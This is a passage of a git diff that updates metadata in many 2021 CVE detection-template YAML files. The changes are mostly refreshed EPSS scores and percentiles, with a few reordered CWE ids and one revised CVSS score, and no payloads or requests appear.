0.00106 + epss-percentile: 0.42772 cpe: cpe:2.3:a:flask-security_project:flask-security:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-32682.yaml b/http/cves/2021/CVE-2021-32682.yaml index 01b7f554f5..a8bcc7b7ff 100644 --- a/http/cves/2021/CVE-2021-32682.yaml +++ b/http/cves/2021/CVE-2021-32682.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-32682 cwe-id: CWE-22 - epss-score: 0.97196 - epss-percentile: 0.99777 + epss-score: 0.97206 + epss-percentile: 0.99789 cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:* metadata: max-request: 9 diff --git a/http/cves/2021/CVE-2021-32789.yaml b/http/cves/2021/CVE-2021-32789.yaml index 92a084ac9e..c1d2f3d773 100644 --- a/http/cves/2021/CVE-2021-32789.yaml +++ b/http/cves/2021/CVE-2021-32789.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-32789 cwe-id: CWE-89 - epss-score: 0.01731 - epss-percentile: 0.86475 + epss-score: 0.01342 + epss-percentile: 0.84625 cpe: cpe:2.3:a:automattic:woocommerce_blocks:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-32819.yaml b/http/cves/2021/CVE-2021-32819.yaml index 2b30f83196..0f9c733eed 100644 --- a/http/cves/2021/CVE-2021-32819.yaml +++ b/http/cves/2021/CVE-2021-32819.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-32819 cwe-id: CWE-200,NVD-CWE-noinfo - epss-score: 0.90688 - epss-percentile: 0.9855 + epss-score: 0.8751 + epss-percentile: 0.98384 cpe: cpe:2.3:a:squirrelly:squirrelly:8.0.8:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-32820.yaml b/http/cves/2021/CVE-2021-32820.yaml index 82c3a296f8..9f5f4a1419 100644 --- a/http/cves/2021/CVE-2021-32820.yaml +++ b/http/cves/2021/CVE-2021-32820.yaml @@ -19,9 +19,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cve-id: CVE-2021-32820 - cwe-id: CWE-94,CWE-200 - epss-score: 0.00929 - epss-percentile: 0.81158 + cwe-id: CWE-200,CWE-94 + epss-score: 0.01147 + epss-percentile: 0.83216 cpe: cpe:2.3:a:express_handlebars_project:express_handlebars:*:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-32853.yaml b/http/cves/2021/CVE-2021-32853.yaml index 4d5714e3cd..abf73e51df 100644 --- a/http/cves/2021/CVE-2021-32853.yaml +++ b/http/cves/2021/CVE-2021-32853.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.6 cve-id: CVE-2021-32853 cwe-id: CWE-79 - epss-score: 0.01428 - epss-percentile: 0.85031 + epss-score: 0.01224 + epss-percentile: 0.83856 cpe: cpe:2.3:a:erxes:erxes:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-3293.yaml b/http/cves/2021/CVE-2021-3293.yaml index cf744fc8e7..822fcbc2e6 100644 --- a/http/cves/2021/CVE-2021-3293.yaml +++ b/http/cves/2021/CVE-2021-3293.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-3293 cwe-id: CWE-22 epss-score: 0.003 - epss-percentile: 0.66084 + epss-percentile: 0.66269 cpe: cpe:2.3:a:emlog:emlog:5.3.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-3297.yaml b/http/cves/2021/CVE-2021-3297.yaml index ecb3de79eb..12beffa6aa 100644 --- a/http/cves/2021/CVE-2021-3297.yaml +++ b/http/cves/2021/CVE-2021-3297.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-3297 cwe-id: CWE-287 epss-score: 0.16417 - epss-percentile: 0.95476 + epss-percentile: 0.95503 cpe: cpe:2.3:o:zyxel:nbg2105_firmware:v1.00\(aagu.2\)c0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33044.yaml b/http/cves/2021/CVE-2021-33044.yaml index a8395d69f9..b08d604983 100644 --- a/http/cves/2021/CVE-2021-33044.yaml +++ b/http/cves/2021/CVE-2021-33044.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-33044 cwe-id: CWE-287 epss-score: 0.29051 - epss-percentile: 0.9642 + epss-percentile: 0.96446 cpe: cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33221.yaml b/http/cves/2021/CVE-2021-33221.yaml index e4bf9a8738..fb213a0e53 100644 --- a/http/cves/2021/CVE-2021-33221.yaml +++ b/http/cves/2021/CVE-2021-33221.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-33221 cwe-id: CWE-306 - epss-score: 0.25994 - epss-percentile: 0.96254 + epss-score: 0.23566 + epss-percentile: 0.96135 cpe: cpe:2.3:a:commscope:ruckus_iot_controller:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33357.yaml b/http/cves/2021/CVE-2021-33357.yaml index ebbabdfee8..8af1562285 100644 --- a/http/cves/2021/CVE-2021-33357.yaml +++ b/http/cves/2021/CVE-2021-33357.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-33357 cwe-id: CWE-78 - epss-score: 0.96582 - epss-percentile: 0.99517 + epss-score: 0.96763 + epss-percentile: 0.99597 cpe: cpe:2.3:a:raspap:raspap:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33544.yaml b/http/cves/2021/CVE-2021-33544.yaml index be25bfe7f0..f412783af9 100644 --- a/http/cves/2021/CVE-2021-33544.yaml +++ b/http/cves/2021/CVE-2021-33544.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-33544 cwe-id: CWE-78 epss-score: 0.9752 - epss-percentile: 0.99985 + epss-percentile: 0.99987 cpe: cpe:2.3:h:geutebrueck:g-cam_ebc-2110:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33564.yaml b/http/cves/2021/CVE-2021-33564.yaml index 863e8c8cb2..059f4350bc 100644 --- a/http/cves/2021/CVE-2021-33564.yaml +++ b/http/cves/2021/CVE-2021-33564.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-33564 cwe-id: CWE-88 - epss-score: 0.07998 - epss-percentile: 0.93619 + epss-score: 0.09259 + epss-percentile: 0.94099 cpe: cpe:2.3:a:dragonfly_project:dragonfly:*:*:*:*:*:ruby:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-33690.yaml b/http/cves/2021/CVE-2021-33690.yaml index 2af06e6db1..c31d428bd1 100644 --- a/http/cves/2021/CVE-2021-33690.yaml +++ b/http/cves/2021/CVE-2021-33690.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-33690 cwe-id: CWE-918 epss-score: 0.37614 - epss-percentile: 0.96831 + epss-percentile: 0.9685 cpe: cpe:2.3:a:sap:netweaver_development_infrastructure:7.11:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-3374.yaml b/http/cves/2021/CVE-2021-3374.yaml index 6a0582cd0a..d10386c737 100644 --- a/http/cves/2021/CVE-2021-3374.yaml +++ b/http/cves/2021/CVE-2021-3374.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.3 cve-id: CVE-2021-3374 cwe-id: CWE-22 - epss-score: 0.00206 - epss-percentile: 0.58346 + epss-score: 0.00235 + epss-percentile: 0.61534 cpe: cpe:2.3:a:rstudio:shiny_server:*:*:*:*:pro:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-3377.yaml b/http/cves/2021/CVE-2021-3377.yaml index d5583f09f3..ac7a068365 100644 --- a/http/cves/2021/CVE-2021-3377.yaml +++ b/http/cves/2021/CVE-2021-3377.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-3377 cwe-id: CWE-79 epss-score: 0.00129 - epss-percentile: 0.47354 + epss-percentile: 0.47461 cpe: cpe:2.3:a:ansi_up_project:ansi_up:*:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-3378.yaml b/http/cves/2021/CVE-2021-3378.yaml index 6b03b6db65..b2063ce172 100644 --- a/http/cves/2021/CVE-2021-3378.yaml +++ b/http/cves/2021/CVE-2021-3378.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-3378 cwe-id: CWE-434 - epss-score: 0.2726 - epss-percentile: 0.96315 + epss-score: 0.43358 + epss-percentile: 0.97016 cpe: cpe:2.3:a:fortilogger:fortilogger:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-33807.yaml b/http/cves/2021/CVE-2021-33807.yaml index fde34ca53a..ae3d447efa 100644 --- a/http/cves/2021/CVE-2021-33807.yaml +++ b/http/cves/2021/CVE-2021-33807.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-33807 cwe-id: CWE-22 epss-score: 0.02331 - epss-percentile: 0.88562 + epss-percentile: 0.88625 cpe: cpe:2.3:a:gespage:gespage:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-33851.yaml b/http/cves/2021/CVE-2021-33851.yaml index c7a03c12b0..d9ab9b863e 100644 --- a/http/cves/2021/CVE-2021-33851.yaml +++ b/http/cves/2021/CVE-2021-33851.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-33851 cwe-id: CWE-79 epss-score: 0.00069 - epss-percentile: 0.28531 + epss-percentile: 0.285 cpe: cpe:2.3:a:apasionados:customize_login_image:3.4:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-33904.yaml b/http/cves/2021/CVE-2021-33904.yaml index 2e779e9b34..9a89d9879d 100644 --- a/http/cves/2021/CVE-2021-33904.yaml +++ b/http/cves/2021/CVE-2021-33904.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-33904 cwe-id: CWE-79 - epss-score: 0.00152 - epss-percentile: 0.51246 + epss-score: 0.00159 + epss-percentile: 0.52329 cpe: cpe:2.3:a:accela:civic_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-34370.yaml b/http/cves/2021/CVE-2021-34370.yaml index 873a80f3d9..909b654ca4 100644 --- a/http/cves/2021/CVE-2021-34370.yaml +++ b/http/cves/2021/CVE-2021-34370.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-34370 cwe-id: CWE-79 epss-score: 0.00183 - epss-percentile: 0.55429 + epss-percentile: 0.55601 cpe: cpe:2.3:a:accela:civic_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-34429.yaml b/http/cves/2021/CVE-2021-34429.yaml index 6cb9424fe3..e34bceb452 100644 --- a/http/cves/2021/CVE-2021-34429.yaml +++ b/http/cves/2021/CVE-2021-34429.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-34429 cwe-id: CWE-200,NVD-CWE-Other epss-score: 0.45742 - epss-percentile: 0.97067 + epss-percentile: 0.97082 cpe: cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-34473.yaml b/http/cves/2021/CVE-2021-34473.yaml index 7b02dc9c10..c1483b4dd8 100644 --- a/http/cves/2021/CVE-2021-34473.yaml +++ b/http/cves/2021/CVE-2021-34473.yaml @@ -16,12 +16,12 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-34473 - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34473 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.1 cve-id: CVE-2021-34473 cwe-id: CWE-918 - epss-score: 0.97344 - epss-percentile: 0.99873 + epss-score: 0.97078 + epss-percentile: 0.99722 cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-34621.yaml b/http/cves/2021/CVE-2021-34621.yaml index 564ff97e36..cbcd61193c 100644 --- a/http/cves/2021/CVE-2021-34621.yaml +++ b/http/cves/2021/CVE-2021-34621.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-34621 cwe-id: CWE-306,CWE-269 epss-score: 0.7888 - epss-percentile: 0.97961 + epss-percentile: 0.97984 cpe: cpe:2.3:a:properfraction:profilepress:*:*:*:*:*:wordpress:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-34640.yaml b/http/cves/2021/CVE-2021-34640.yaml index ea00604f64..a36a8f7eba 100644 --- a/http/cves/2021/CVE-2021-34640.yaml +++ b/http/cves/2021/CVE-2021-34640.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-34640 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.4508 + epss-percentile: 0.45185 cpe: cpe:2.3:a:securimage-wp-fixed_project:securimage-wp-fixed:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-34643.yaml b/http/cves/2021/CVE-2021-34643.yaml index 42c1b77065..f655e448b4 100644 --- a/http/cves/2021/CVE-2021-34643.yaml +++ b/http/cves/2021/CVE-2021-34643.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-34643 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.4508 + epss-percentile: 0.45185 cpe: cpe:2.3:a:skaut-bazar_project:skaut-bazar:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-34805.yaml b/http/cves/2021/CVE-2021-34805.yaml index 638859e6a9..568b380db3 100644 --- a/http/cves/2021/CVE-2021-34805.yaml +++ b/http/cves/2021/CVE-2021-34805.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-34805 cwe-id: CWE-22 epss-score: 0.02853 - epss-percentile: 0.89611 + epss-percentile: 0.89669 cpe: cpe:2.3:a:land-software:faust_iserver:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-35250.yaml b/http/cves/2021/CVE-2021-35250.yaml index 3cd335e1af..1e8ac12dbf 100644 --- a/http/cves/2021/CVE-2021-35250.yaml +++ b/http/cves/2021/CVE-2021-35250.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-35250 cwe-id: CWE-22 - epss-score: 0.05691 - epss-percentile: 0.92527 + epss-score: 0.06268 + epss-percentile: 0.92895 cpe: cpe:2.3:a:solarwinds:serv-u:15.3:-:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-35265.yaml b/http/cves/2021/CVE-2021-35265.yaml index 3a08d5cbc2..b693e8d8c2 100644 --- a/http/cves/2021/CVE-2021-35265.yaml +++ b/http/cves/2021/CVE-2021-35265.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-35265 cwe-id: CWE-79 epss-score: 0.00127 - epss-percentile: 0.47003 + epss-percentile: 0.47114 cpe: cpe:2.3:a:maxsite:maxsite_cms:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-35323.yaml b/http/cves/2021/CVE-2021-35323.yaml index fdbd7c11ae..e5f1d82bd6 100644 --- a/http/cves/2021/CVE-2021-35323.yaml +++ b/http/cves/2021/CVE-2021-35323.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-35323 cwe-id: CWE-79 epss-score: 0.00183 - epss-percentile: 0.55429 + epss-percentile: 0.55601 cpe: cpe:2.3:a:bludit:bludit:3.13.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-35336.yaml b/http/cves/2021/CVE-2021-35336.yaml index e627033b92..cbffe4d86c 100644 --- a/http/cves/2021/CVE-2021-35336.yaml +++ b/http/cves/2021/CVE-2021-35336.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-35336 cwe-id: CWE-1188 - epss-score: 0.08605 - epss-percentile: 0.93847 + epss-score: 0.07599 + epss-percentile: 0.93498 cpe: cpe:2.3:o:tieline:ip_audtio_gateway_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-35380.yaml b/http/cves/2021/CVE-2021-35380.yaml index cbd46896a2..35a02f761d 100644 --- a/http/cves/2021/CVE-2021-35380.yaml +++ b/http/cves/2021/CVE-2021-35380.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-35380 cwe-id: CWE-22 epss-score: 0.23467 - epss-percentile: 0.96102 + epss-percentile: 0.9613 cpe: cpe:2.3:a:solari:termtalk_server:3.24.0.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-35395.yaml b/http/cves/2021/CVE-2021-35395.yaml index e45a528070..71bf03929e 100644 --- a/http/cves/2021/CVE-2021-35395.yaml +++ b/http/cves/2021/CVE-2021-35395.yaml @@ -17,7 +17,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-35395 epss-score: 0.97119 - epss-percentile: 0.99736 + epss-percentile: 0.99744 cpe: cpe:2.3:a:realtek:realtek_jungle_sdk:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-35464.yaml b/http/cves/2021/CVE-2021-35464.yaml index 189acf310a..fd3fb0e568 100644 --- a/http/cves/2021/CVE-2021-35464.yaml +++ b/http/cves/2021/CVE-2021-35464.yaml @@ -24,8 +24,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-35464 cwe-id: CWE-502 - epss-score: 0.97366 - epss-percentile: 0.99885 + epss-score: 0.97357 + epss-percentile: 0.99883 cpe: cpe:2.3:a:forgerock:am:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-35488.yaml b/http/cves/2021/CVE-2021-35488.yaml index 66a7dd9af7..512cb7f2cb 100644 --- a/http/cves/2021/CVE-2021-35488.yaml +++ b/http/cves/2021/CVE-2021-35488.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-35488 cwe-id: CWE-79 epss-score: 0.00145 - epss-percentile: 0.50124 + epss-percentile: 0.50234 cpe: cpe:2.3:a:thruk:thruk:2.40-2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-35587.yaml b/http/cves/2021/CVE-2021-35587.yaml index c192ed8efb..82d156222e 100644 --- a/http/cves/2021/CVE-2021-35587.yaml +++ b/http/cves/2021/CVE-2021-35587.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-35587 cwe-id: CWE-502 epss-score: 0.95643 - epss-percentile: 0.99249 + epss-percentile: 0.99271 cpe: cpe:2.3:a:oracle:access_manager:11.1.2.3.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-3577.yaml b/http/cves/2021/CVE-2021-3577.yaml index d979655e90..e3ebd4a574 100644 --- a/http/cves/2021/CVE-2021-3577.yaml +++ b/http/cves/2021/CVE-2021-3577.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-3577 cwe-id: CWE-863,CWE-78 - epss-score: 0.96865 - epss-percentile: 0.99626 + epss-score: 0.96689 + epss-percentile: 0.99568 cpe: cpe:2.3:o:binatoneglobal:halo\+_camera_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-36260.yaml b/http/cves/2021/CVE-2021-36260.yaml index b77ab1e4b0..dca679463c 100644 --- a/http/cves/2021/CVE-2021-36260.yaml +++ b/http/cves/2021/CVE-2021-36260.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-36260 cwe-id: CWE-78 - epss-score: 0.97506 - epss-percentile: 0.99979 + epss-score: 0.97484 + epss-percentile: 0.99965 cpe: cpe:2.3:o:hikvision:ds-2cd2026g2-iu\/sl_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-36356.yaml b/http/cves/2021/CVE-2021-36356.yaml index 33db0f79e7..d3de155897 100644 --- a/http/cves/2021/CVE-2021-36356.yaml +++ b/http/cves/2021/CVE-2021-36356.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-36356 cwe-id: CWE-434 - epss-score: 0.88363 - epss-percentile: 0.98398 + epss-score: 0.93009 + epss-percentile: 0.98853 cpe: cpe:2.3:a:kramerav:viaware:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-36380.yaml b/http/cves/2021/CVE-2021-36380.yaml index 47fb93397a..6f0453ee66 100644 --- a/http/cves/2021/CVE-2021-36380.yaml +++ b/http/cves/2021/CVE-2021-36380.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-36380 cwe-id: CWE-78 - epss-score: 0.97185 - epss-percentile: 0.99771 + epss-score: 0.97166 + epss-percentile: 0.99767 cpe: cpe:2.3:a:sunhillo:sureline:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-36450.yaml b/http/cves/2021/CVE-2021-36450.yaml index 0c8f245e85..1db8dc3dc7 100644 --- a/http/cves/2021/CVE-2021-36450.yaml +++ b/http/cves/2021/CVE-2021-36450.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-36450 cwe-id: CWE-79 epss-score: 0.00229 - epss-percentile: 0.60952 + epss-percentile: 0.61111 cpe: cpe:2.3:a:verint:workforce_optimization:15.2.8.10048:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-3654.yaml b/http/cves/2021/CVE-2021-3654.yaml index 22f679e4c7..e050a52bc4 100644 --- a/http/cves/2021/CVE-2021-3654.yaml +++ b/http/cves/2021/CVE-2021-3654.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-3654 cwe-id: CWE-601 epss-score: 0.92596 - epss-percentile: 0.98773 + epss-percentile: 0.98805 cpe: cpe:2.3:a:openstack:nova:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-36580.yaml b/http/cves/2021/CVE-2021-36580.yaml index a853cabdc8..0099ad285e 100644 --- a/http/cves/2021/CVE-2021-36580.yaml +++ b/http/cves/2021/CVE-2021-36580.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-36580 cwe-id: CWE-601 epss-score: 0.00162 - epss-percentile: 0.52689 + epss-percentile: 0.52783 cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-36748.yaml b/http/cves/2021/CVE-2021-36748.yaml index 026400e007..298bcdcc98 100644 --- a/http/cves/2021/CVE-2021-36748.yaml +++ b/http/cves/2021/CVE-2021-36748.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-36748 cwe-id: CWE-89 epss-score: 0.0061 - epss-percentile: 0.76213 + epss-percentile: 0.76314 cpe: cpe:2.3:a:prestahome:blog:*:*:*:*:*:prestashop:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-36749.yaml b/http/cves/2021/CVE-2021-36749.yaml index 6f3fab77db..fb9e5b56e8 100644 --- a/http/cves/2021/CVE-2021-36749.yaml +++ b/http/cves/2021/CVE-2021-36749.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.5 cve-id: CVE-2021-36749 cwe-id: CWE-863 - epss-score: 0.77213 - epss-percentile: 0.97915 + epss-score: 0.80294 + epss-percentile: 0.98031 cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-36873.yaml b/http/cves/2021/CVE-2021-36873.yaml index 6e1760953c..99017fb917 100644 --- a/http/cves/2021/CVE-2021-36873.yaml +++ b/http/cves/2021/CVE-2021-36873.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-36873 cwe-id: CWE-79 epss-score: 0.00131 - epss-percentile: 0.47734 + epss-percentile: 0.47831 cpe: cpe:2.3:a:webence:iq_block_country:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-37216.yaml b/http/cves/2021/CVE-2021-37216.yaml index 63e2cc711c..95512885b0 100644 --- a/http/cves/2021/CVE-2021-37216.yaml +++ b/http/cves/2021/CVE-2021-37216.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-37216 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42778 + epss-percentile: 0.42861 cpe: cpe:2.3:o:qsan:xn8024r_firmware:3.1.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-37304.yaml b/http/cves/2021/CVE-2021-37304.yaml index 28e7d10b45..787677600b 100644 --- a/http/cves/2021/CVE-2021-37304.yaml +++ b/http/cves/2021/CVE-2021-37304.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-37304 cwe-id: CWE-732 - epss-score: 0.00879 - epss-percentile: 0.80581 + epss-score: 0.00917 + epss-percentile: 0.81102 cpe: cpe:2.3:a:jeecg:jeecg:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-37305.yaml b/http/cves/2021/CVE-2021-37305.yaml index 02d20cff74..08810a8cb2 100644 --- a/http/cves/2021/CVE-2021-37305.yaml +++ b/http/cves/2021/CVE-2021-37305.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-37305 cwe-id: CWE-732 - epss-score: 0.00278 - epss-percentile: 0.64732 + epss-score: 0.0029 + epss-percentile: 0.65718 cpe: cpe:2.3:a:jeecg:jeecg:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-37416.yaml b/http/cves/2021/CVE-2021-37416.yaml index 131d54048c..4d7b6e23cd 100644 --- a/http/cves/2021/CVE-2021-37416.yaml +++ b/http/cves/2021/CVE-2021-37416.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-37416 cwe-id: CWE-79 epss-score: 0.00118 - epss-percentile: 0.45542 + epss-percentile: 0.4565 cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-37538.yaml b/http/cves/2021/CVE-2021-37538.yaml index bf5406bb87..4b7a6ec02d 100644 --- a/http/cves/2021/CVE-2021-37538.yaml +++ b/http/cves/2021/CVE-2021-37538.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-37538 cwe-id: CWE-89 - epss-score: 0.02618 - epss-percentile: 0.89174 + epss-score: 0.02819 + epss-percentile: 0.89609 cpe: cpe:2.3:a:smartdatasoft:smartblog:*:*:*:*:*:prestashop:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-37573.yaml b/http/cves/2021/CVE-2021-37573.yaml index 8355c00d5a..d8dc27df09 100644 --- a/http/cves/2021/CVE-2021-37573.yaml +++ b/http/cves/2021/CVE-2021-37573.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-37573 cwe-id: CWE-79 epss-score: 0.00303 - epss-percentile: 0.66239 + epss-percentile: 0.6643 cpe: cpe:2.3:a:tiny_java_web_server_project:tiny_java_web_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-37580.yaml b/http/cves/2021/CVE-2021-37580.yaml index e7fb53de92..c740c90a18 100644 --- a/http/cves/2021/CVE-2021-37580.yaml +++ b/http/cves/2021/CVE-2021-37580.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-37580 cwe-id: CWE-287 - epss-score: 0.91668 - epss-percentile: 0.98654 + epss-score: 0.91956 + epss-percentile: 0.9872 cpe: cpe:2.3:a:apache:shenyu:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-37589.yaml b/http/cves/2021/CVE-2021-37589.yaml index 1c93bada20..af3d793945 100644 --- a/http/cves/2021/CVE-2021-37589.yaml +++ b/http/cves/2021/CVE-2021-37589.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-37589 cwe-id: CWE-89 - epss-score: 0.00561 - epss-percentile: 0.75101 + epss-score: 0.00661 + epss-percentile: 0.77395 cpe: cpe:2.3:a:virtuasoftware:cobranca:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-37704.yaml b/http/cves/2021/CVE-2021-37704.yaml index 789775bc50..318230048b 100644 --- a/http/cves/2021/CVE-2021-37704.yaml +++ b/http/cves/2021/CVE-2021-37704.yaml @@ -19,9 +19,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N cvss-score: 4.3 cve-id: CVE-2021-37704 - cwe-id: CWE-668,CWE-200 - epss-score: 0.00283 - epss-percentile: 0.65054 + cwe-id: CWE-200,CWE-668 + epss-score: 0.00372 